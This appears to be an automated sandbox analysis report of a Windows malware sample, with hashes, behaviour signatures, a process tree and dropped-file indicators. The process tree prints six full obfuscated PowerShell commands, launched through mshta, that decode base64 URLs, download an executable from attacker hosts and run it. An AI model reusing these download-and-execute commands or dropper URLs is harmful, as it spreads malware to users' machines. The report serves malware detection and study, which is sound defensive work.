Analysis

  • max time kernel
    150s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    25/06/2022, 09:08

General

  • Target

    a28b0824e48b4ca32608126458bd5d345015cd5c2e380d479d7e43d72611fcc3.exe

  • Size

    1.9MB

  • MD5

    b0b47d69cc54b277235b470ba486c710

  • SHA1

    c7f46aba6a3c8b929f322585dc162ae98129221d

  • SHA256

    a28b0824e48b4ca32608126458bd5d345015cd5c2e380d479d7e43d72611fcc3

  • SHA512

    5565c09d98017f3eb1065bbd1c3d7870a41e29597ed17f39eaebabc4cd1ee7255ef817a15643cc32ededacebfdeee4ebf7bcc5f08cfa55b50c48cf3e40392d9a

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs
    ps1.dropper
    http://asdsadasrdc.ug/asdfg.exe
    exe.dropper
    http://asdsadasrdc.ug/asdfg.exe

Signatures

  • Blocklisted process makes network request (6 IoCs)
  • Downloads MZ/PE file
  • Executes dropped EXE (2 IoCs)
  • Checks computer location settings (2 TTPs, 9 IoCs)

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Delays execution with timeout.exe (6 IoCs)
  • Modifies registry class (1 IoC)
  • Suspicious behavior: EnumeratesProcesses (12 IoCs)
  • Suspicious use of AdjustPrivilegeToken (6 IoCs)
  • Suspicious use of WriteProcessMemory (64 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\a28b0824e48b4ca32608126458bd5d345015cd5c2e380d479d7e43d72611fcc3.exe
    "C:\Users\Admin\AppData\Local\Temp\a28b0824e48b4ca32608126458bd5d345015cd5c2e380d479d7e43d72611fcc3.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1532
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\80ED.tmp\start2.bat" C:\Users\Admin\AppData\Local\Temp\a28b0824e48b4ca32608126458bd5d345015cd5c2e380d479d7e43d72611fcc3.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2748
      • C:\Users\Admin\AppData\Local\Temp\_outputcrack.exe
        _outputcrack.exe
        3⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:5104
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\50CF.tmp\start2.bat" C:\Users\Admin\AppData\Local\Temp\_outputcrack.exe"
          4⤵
          • Checks computer location settings
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:3180
          • C:\Windows\SysWOW64\timeout.exe
            timeout 1
            5⤵
            • Delays execution with timeout.exe
            PID:4548
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\50CF.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
            5⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:4524
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wgcxnm $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wgcxnm syfpbmd $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|syfpbmd;wgcxnm zkfwidtoglep $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2N1dHQubHkvemV5SHF5SA==';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);zkfwidtoglep $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
              6⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1256
          • C:\Windows\SysWOW64\timeout.exe
            timeout 2
            5⤵
            • Delays execution with timeout.exe
            PID:1376
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\50CF.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
            5⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:4132
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL fwlunt $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;fwlunt tawoxvyelijpum $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|tawoxvyelijpum;fwlunt fsqevtxyumpr $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2FzZHNhZGFzcmRjLnVnL2FzZGZnLmV4ZQ==';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);fsqevtxyumpr $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
              6⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1764
              • C:\Users\Public\arp.exe
                "C:\Users\Public\arp.exe"
                7⤵
                • Executes dropped EXE
                PID:3824
          • C:\Windows\SysWOW64\timeout.exe
            timeout 3
            5⤵
            • Delays execution with timeout.exe
            PID:4164
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\50CF.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
            5⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:208
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL fydir $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;fydir bqzfr $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bqzfr;fydir htfdxvgcn $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL3Rpbnl1cmwuY29tL3kzcDc3dWZl';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);htfdxvgcn $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
              6⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3720
          • C:\Windows\SysWOW64\timeout.exe
            timeout 4
            5⤵
            • Delays execution with timeout.exe
            PID:216
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\50CF.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
            5⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:5044
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL saduxocqtzmby $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;saduxocqtzmby imgbedtwlzyok $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|imgbedtwlzyok;saduxocqtzmby evgskhmqljibn $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL21hcmFsc2tkcy51Zy9hc2RmZy5leGU=';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);evgskhmqljibn $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:5056
          • C:\Windows\SysWOW64\timeout.exe
            timeout 5
            5⤵
            • Delays execution with timeout.exe
            PID:2100
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\50CF.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
            5⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:5048
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL lnkdvtwhojby $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;lnkdvtwhojby tehacx $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|tehacx;lnkdvtwhojby zkvslpeiwac $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2JpdC5kby9mYnNjaw==';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);zkvslpeiwac $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
              6⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2132
          • C:\Windows\SysWOW64\timeout.exe
            timeout 6
            5⤵
            • Delays execution with timeout.exe
            PID:4440
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\50CF.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
            5⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:3836
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL lpyeqrz $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;lpyeqrz dpwges $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|dpwges;lpyeqrz ynlpmogafidr $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL3BhaXBhaXNkdnp4Yy5ydS9hc2RmZy5leGU=';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);ynlpmogafidr $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:5024

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    25604a2821749d30ca35877a7669dff9

    SHA1

    49c624275363c7b6768452db6868f8100aa967be

    SHA256

    7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476

    SHA512

    206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

    Filesize

    53KB

    MD5

    d4d8cef58818612769a698c291ca3b37

    SHA1

    54e0a6e0c08723157829cea009ec4fe30bea5c50

    SHA256

    98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

    SHA512

    f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    19KB

    MD5

    fb8739a928d4249d6d5e855385ab30a7

    SHA1

    ee84d14c42c55ea3304fdd56624ef83144fddd2f

    SHA256

    cefd5e4241cc15681c6e90bae415045807602a9c28939e745a1d649b0888e897

    SHA512

    af98046f4d25c7fc4b5176f55209ed33868cafa0d2401d0d28186d993780d39b738ea7876bc9ba2ba9516caaae2bc00b1e58ea636aa859bfd9fe1e4b1cf96bb4

  • C:\Users\Admin\AppData\Local\Temp\50CF.tmp\b.hta

    Filesize

    11KB

    MD5

    2c81f1d8d202dfaa50534d7401324fce

    SHA1

    955ec5779d4d4cba14e98ed14fa3f474c36d059a

    SHA256

    c0b1c6c1380abb47f9fd7ca7728149f0b6a2f56119116b7ad31d1df1678723cd

    SHA512

    1a84fc615a3829f7feb94558b2afe95c8b43942212dd7deb7b5103ac4a35afbb59da8504692972d8da8b6e744eb78efdf28cfea1df6c9dce5f536149c40916f0

  • C:\Users\Admin\AppData\Local\Temp\50CF.tmp\b1.hta

    Filesize

    11KB

    MD5

    5cee90fba6052aa18555a5aedb6545a2

    SHA1

    4dac96e8a4858ef748c4a23dea441c2d0c90737c

    SHA256

    ab44c1f385c343483d3213ae8c226f9a023ee5803bb07d5a85fb62aa3a0313d8

    SHA512

    f0715a5611414631dddbe2127a91d67dfb02b2cabd9ee94e20d44ba6354708de45cf8f8f1d617c40901abce0f3609a38255486a7ff9c04ceb46d6b80163d89c9

  • C:\Users\Admin\AppData\Local\Temp\50CF.tmp\ba.hta

    Filesize

    11KB

    MD5

    18f43f6d9704d278fb99236cdc439751

    SHA1

    b652f5ebbd3ef24feee2053203d962600de1e4cf

    SHA256

    288fb158f4c2d1852349e05215b3352a0fa8fed3efd494ea2fb603cf0bb910b0

    SHA512

    7fe958edcae3ca1f663c039bb4c0a49a74a141b5d3658ab700c1f7bb2b0e8900e70ef17632ef5febd5052eba4c2a1db1ab57e2d38d4141fcbfc3f260ef451bb5

  • C:\Users\Admin\AppData\Local\Temp\50CF.tmp\ba1.hta

    Filesize

    11KB

    MD5

    bc293d0abb1e83d4b3efb852ec6cd503

    SHA1

    57366b64757ec77113ddebc947e18878b0c002ed

    SHA256

    bfbddae3cd305621b016d235fac7619636609f473ecd9c44925983861bd992aa

    SHA512

    c842075e53b68f39a548dd1497b2227bcd8ea584b8df1cba74292159ecc65b6ef1a71165e62cad4abb23891acd2938ecf16a4fd97f333c604dace2cd5ed1590a

  • C:\Users\Admin\AppData\Local\Temp\50CF.tmp\m.hta

    Filesize

    11KB

    MD5

    87da84d144c0c3de8496f4db7aa43886

    SHA1

    90ca12c6f24d3fc20f0465a33f1607f3cd23481e

    SHA256

    fb64afdcb591fd581b8304788911c99ad946e2db79066fc42de120989944bfe0

    SHA512

    954cfbad14d54f0f1fb1d3528abb21f0800adf77a4b888f93204e78a15670431c425dd340496aa3fe431d60f99d063a1461d1f5589d84ee682764b0357c89368

  • C:\Users\Admin\AppData\Local\Temp\50CF.tmp\m1.hta

    Filesize

    11KB

    MD5

    75c942a1fcacafe136b2a96e928e0202

    SHA1

    ae7ae439fe2a2d5101cc0af1e5578995a30e7859

    SHA256

    b333190b12515100bebeceb83c10ee7942f68e5765702b81bd6209788c4f04ea

    SHA512

    cba71256c3d08e254b7c57196cdd47e748f470f0d8bc4b6f998e7b78b343b071d05123eb0cc7f6134681e6c2c2436dc7e8b5eedc5c289b2f05677b9d10475e2a

  • C:\Users\Admin\AppData\Local\Temp\50CF.tmp\start2.bat

    Filesize

    194B

    MD5

    590abfac7d6aeca7cdd69ac155508300

    SHA1

    b810396782f6c372aad9bd166a142b737909c9d2

    SHA256

    5f1c0e8004630621436a9769d1df115c854947984b91b38420487c20d368ccd8

    SHA512

    8542f862b12ec15c5ef3851613aa5264a745b3a34c249286588947d7030602454020006ff30d110d2308798a1e2c1cfeb2a33ed23a0b11793ef73d0c106d1793

  • C:\Users\Admin\AppData\Local\Temp\80ED.tmp\start2.bat

    Filesize

    69B

    MD5

    e98d4e29be5a27f8aff16b61369e5b88

    SHA1

    f1819a3d9329cea8d1603143bb81efd0a0404cd4

    SHA256

    af355683e78c8fa03f49c0621890eff7ee3ed2d9507ae45361a7ee271f20b74d

    SHA512

    ade3ad78ecbb269124df78400b6376af21baf6246b101a9332eacf4271ce40d88ba3f42fc5f772f7dd69d7bb941fa55be68b1a6b1883f47782a2c55bc115e2d1

  • C:\Users\Admin\AppData\Local\Temp\_outputcrack.exe

    Filesize

    107KB

    MD5

    b47cde87fb3ede19c11022eaa530e7ed

    SHA1

    c00a4d999338b293f4d17f342b1f3f4ac572341c

    SHA256

    e83eb8e945e1fe3548c4ded6ff3f76c39ba8862a3d377f65e96fd0330917615f

    SHA512

    2890566d06cd53ffcc44d66b4ea76c2f33cb5d3509477963a4e873d25ce298aeb851cebea1401ce7130b7445c9ee48a73a533e0206c03efb9e48fc7fd607a5a0

  • C:\Users\Public\arp.exe

    Filesize

    768KB

    MD5

    63645a9e1f5e77ba3c75366f3a14ab87

    SHA1

    ed1497c47dc283118bbc57d49cd9f354785cf73d

    SHA256

    2ced9b36b931b73b1d325bececd01f0e4fa6bd0fff98f8b76f2f45b473311cd0

    SHA512

    4efce16194322c1288603ccd4ab6507fa5905debb137ce9b200e7a76e2c041c2d2aa720061b0679f2dfb5c21a668e12fe5eeb5fe99542f5a88d4bcdf103296f0

  • memory/1256-147-0x0000000004F20000-0x0000000005548000-memory.dmp

    Filesize

    6.2MB

  • memory/1764-151-0x0000000004CA0000-0x0000000004CC2000-memory.dmp

    Filesize

    136KB

  • memory/1764-166-0x0000000004D10000-0x0000000004D2E000-memory.dmp

    Filesize

    120KB

  • memory/1764-153-0x0000000005540000-0x00000000055A6000-memory.dmp

    Filesize

    408KB

  • memory/1764-152-0x0000000004E40000-0x0000000004EA6000-memory.dmp

    Filesize

    408KB

  • memory/1764-146-0x0000000002230000-0x0000000002266000-memory.dmp

    Filesize

    216KB

  • memory/1764-168-0x0000000006A40000-0x0000000006A5A000-memory.dmp

    Filesize

    104KB

  • memory/2132-167-0x0000000007F20000-0x000000000859A000-memory.dmp

    Filesize

    6.5MB

  • memory/3720-170-0x00000000070D0000-0x00000000070F2000-memory.dmp

    Filesize

    136KB

  • memory/3824-182-0x0000000004CC0000-0x0000000004D36000-memory.dmp

    Filesize

    472KB

  • memory/3824-179-0x00000000003B0000-0x0000000000476000-memory.dmp

    Filesize

    792KB

  • memory/5024-171-0x0000000008200000-0x00000000087A4000-memory.dmp

    Filesize

    5.6MB

  • memory/5056-169-0x0000000007020000-0x00000000070B6000-memory.dmp

    Filesize

    600KB